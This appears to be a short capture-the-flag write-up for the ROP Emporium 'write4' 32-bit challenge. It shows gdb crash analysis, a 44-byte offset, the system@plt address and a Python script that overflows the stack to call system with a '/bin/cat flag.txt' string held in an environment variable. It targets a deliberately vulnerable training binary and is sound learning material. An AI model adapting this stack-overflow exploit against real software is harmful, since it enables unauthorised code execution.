'''
recon

export FLAG='/bin/cat flag.txt'

./getenv FLAG ./write432
FLAG|0xbffffe91

(gdb) r <<<$(python pattern_offset.py 128)
Program received signal SIGSEGV, Segmentation fault.
0x33433243 in ?? ()
(gdb) quit

root@protostar:/write4# python pattern_offset.py 0x33433243
0x33433243 -> C2C3
Memory offset to exploit: 44 bytes.


(gdb) info functions 
All defined functions:

Non-debugging symbols:
...
0x08048430  system@plt
...

python addr2le.py string:0xbffffe91 systm:0x08048430 noret:0xdeadcafe
string = "\x91\xfe\xff\xbf"
systm = "\x30\x84\x04\x08"
noret = "\xfe\xca\xad\xde"


root@protostar:/write4# python exploit.py | xxd
0000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0000020: 4141 4141 4141 4141 4141 4141 3084 0408  AAAAAAAAAAAA0...
0000030: feca adde 91fe ffbf                      ........
root@protostar:/write4# python exploit.py | ./write432 
write4 by ROP Emporium
32bits

Go ahead and give me the string already!
> ROPE{a_placeholder_32byte_flag!}
Segmentation fault

'''

'''python
string = "\x91\xfe\xff\xbf"
systm = "\x30\x84\x04\x08"
noret = "\xfe\xca\xad\xde"
offset = 44


import sys

sys.stdout.write( "A"*offset + systm + noret + string )
'''